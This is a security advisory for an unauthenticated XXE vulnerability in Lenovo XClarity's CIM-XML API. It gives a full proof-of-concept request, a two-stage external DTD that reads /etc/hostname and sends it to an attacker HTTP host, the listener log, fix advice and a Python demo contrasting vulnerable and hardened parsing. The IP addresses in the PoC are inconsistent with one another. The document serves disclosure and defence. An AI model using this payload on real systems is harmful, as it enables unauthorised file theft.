usd-2019-0045 | XClarity 2.2.0

Advisory ID: usd-2019-0045
CVE Number: CVE-2019-6179
Affected Product: XClarity
Affected Version: 2.2.0
Vulnerability Type: XML External Entity Processing
Security Risk: Critical
Vendor URL: https://www.lenovo.com/
Vendor Status: Fixed
Vendor Advisory: https://support.lenovo.com/de/de/solutions/len-27805

Description

The XClarity appliance exposes a CIM-XML API (the /cimom endpoint) on TCP port 9090. The XML parser behind it resolves external entities declared in the request's DTD, so the endpoint is vulnerable to XML External Entity (XXE) injection. The request in the PoC below carries no credentials and still causes the appliance to fetch attacker-controlled DTD content and to exfiltrate a local file out of band.

Proof of Concept (PoC)

Request:

POST /cimom HTTP/1.1 
Host: 10.10.10.4:9090 
Accept-Encoding: gzip, deflate 
Content-type: application/xml; charset="utf-8" 
Content-Length: 503 
CIMOperation: MethodCall 
CIMObject: root/cimv2 
Connection: close 

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE CIM [
<!ELEMENT CIM ANY >
<!ENTITY % sp SYSTEM "http://10.10.80.241/test.xml">
%sp;
%param1;
]>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0"><SIMPLEREQ>&exfil;<IMETHODCALL NAME="EnumerateInstances"><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH><IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="CIM_ComputerSystem"/></IPARAMVALUE></IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>

Response:

HTTP/1.1 400 Bad Request
Content-Type: application/xml;charset="utf-8"
Content-length: 0
Connection: close

The appliance answers 400 Bad Request and echoes nothing, so the attack is blind. The parser has nevertheless dereferenced both stages of the DTD by the time it rejects the request, as the two hits on the attacker's HTTP listener (the same Python http.server that serves test.xml) show:

pentester:~/www$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.32 - - [24/May/2019 15:27:00] "GET /test.xml HTTP/1.0" 200 -
10.10.10.32 - - [24/May/2019 15:27:00] "GET /?localhost HTTP/1.0" 200 -

Content of test.xml:

<!ENTITY % data SYSTEM "file:///etc/hostname"> 
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.10.241/?%data;'>">

Fix

Disable external entity resolution (and, where the CIM-XML parser allows it, DTD processing altogether) in the XML parser that handles requests on port 9090. Where that is not possible, restrict the CIM API to authenticated users; note that authentication only narrows who can send the payload, it does not remove the parser flaw.
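The appliance's CIM server is a black box, so the following added example (not code from Lenovo, XClarity or usd AG) uses a stand-in parser built on the Python standard library (xml.sax on top of expat) to show what the PoC above exploits and what the fix changes. It feeds the same CIM-XML EnumerateInstances request, with the SYSTEM entity pointing straight at a local file instead of the PoC's two-stage parameter-entity bounce, once to a parser with external entity resolution enabled and once to a hardened one. The file name `hostname`, its content `xclarity-demo`, the temporary directory and the function names are all constructed for the demo; the recording resolver plays the role of the attacker's HTTP listener by logging every URL the parser asks for.

```python
"""Vulnerable versus hardened XML parsing of a CIM-XML request (added demo).

Stand-in for the appliance's CIM server: xml.sax (expat) from the Python
standard library. Everything below (file names, content, URLs) is constructed
for the demonstration.
"""
import io
import pathlib
import tempfile
import xml.sax
from dataclasses import dataclass
from typing import List, Optional
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges


@dataclass
class ParseResult:
    text: str                    # character data the parser produced (expanded entity content included)
    requested: List[str]         # every SYSTEM identifier the parser tried to dereference
    error: Optional[str] = None  # parse error text, if any (the appliance answered such cases with HTTP 400)


class RecordingResolver(EntityResolver):
    """Logs the URLs the parser resolves. This is what the attacker's listener saw in the PoC."""

    def __init__(self) -> None:
        self.requested: List[str] = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        # Handing the URL back unchanged makes xml.sax open it itself (via urllib),
        # which is exactly the behaviour an unrestricted parser has.
        return systemId


class TextCollector(ContentHandler):
    """Collects character data so we can see whether file content ended up in the message."""

    def __init__(self) -> None:
        super().__init__()
        self.parts: List[str] = []

    def characters(self, content: str) -> None:
        self.parts.append(content)


def parse_cim_request(xml_bytes: bytes, *, allow_external_entities: bool) -> ParseResult:
    """Parse a CIM-XML request either as the vulnerable or as the hardened parser would."""
    parser = xml.sax.make_parser()
    # The one switch that matters: with feature_external_ges enabled, the expat-based
    # reader fetches external entities (the callback is used for parameter entities too);
    # disabled, SYSTEM identifiers are never dereferenced and the reference expands to nothing.
    parser.setFeature(feature_external_ges, allow_external_entities)
    resolver, collector = RecordingResolver(), TextCollector()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(collector)
    error = None
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except xml.sax.SAXParseException as exc:
        error = str(exc)
    return ParseResult("".join(collector.parts), resolver.requested, error)


def build_cim_request(secret_url: str) -> bytes:
    """The PoC's EnumerateInstances call with an external entity pointing at a file URL.

    In-band variant: the PoC's parameter-entity chain is only needed to carry the data
    to an attacker host when the server echoes nothing back.
    """
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<!DOCTYPE CIM [\n'
        '<!ELEMENT CIM ANY >\n'
        f'<!ENTITY exfil SYSTEM "{secret_url}">\n'
        ']>\n'
        '<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1001" PROTOCOLVERSION="1.0">'
        '<SIMPLEREQ>&exfil;<IMETHODCALL NAME="EnumerateInstances">'
        '<LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH>'
        '<IPARAMVALUE NAME="ClassName"><CLASSNAME NAME="CIM_ComputerSystem"/></IPARAMVALUE>'
        '</IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>'
    ).encode()


def write_secret_file(directory: str, content: bytes = b"xclarity-demo") -> str:
    """Constructed stand-in for /etc/hostname on the appliance; returns its file:// URL."""
    path = pathlib.Path(directory) / "hostname"
    path.write_bytes(content)
    return path.as_uri()


def run_demo() -> dict:
    """Send the same request to the vulnerable and to the hardened configuration."""
    with tempfile.TemporaryDirectory() as tmp:
        request = build_cim_request(write_secret_file(tmp))
        return {
            "vulnerable": parse_cim_request(request, allow_external_entities=True),
            "hardened": parse_cim_request(request, allow_external_entities=False),
        }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:10s} text={result.text!r} requested={result.requested} error={result.error}")
```

In the vulnerable run the file content appears inside the parsed message and the resolver log holds the file URL; in the hardened run the log stays empty and `&exfil;` expands to nothing, with no parse error. Two practical notes: recent Python releases ship xml.sax with this feature off by default, which is the concrete meaning of "disable external entity processing" for that parser, and the PoC's URL-based exfiltration only carries content that fits into a URL (a single token without line breaks or reserved characters), which is why /etc/hostname is a convenient first target.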

Timeline

  • 2019-05-27 First contact with the vendor via psirt@lenovo.com
  • 2019-09-03 Lenovo discloses the advisory at https://support.lenovo.com/de/de/solutions/len-27805
  • 2019-10-21 First published

Credits

This security vulnerability was found by Tobias Neitzel of usd AG.

ABOUT usd SECURITY ADVISORIES

In order to protect businesses against hackers and criminals, we always have to keep our skills and knowledge up to date. Thus, security research is just as important for our work as is building up a security community to promote the exchange of knowledge. After all, more security can only be achieved if many individuals take on the task.

Our CST Academy and our usd HeroLab are essential parts of our security mission. We share the knowledge we gain in our practical work and our research through training courses and publications. In this context, the usd HeroLab publishes a series of papers on new vulnerabilities and current security issues.

Always for the sake of our mission: "more security."



In accordance with usd AG's Responsible Disclosure Policy, the vendor has been notified of the existence of this vulnerability.

Disclaimer

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide information that is as accurate as possible.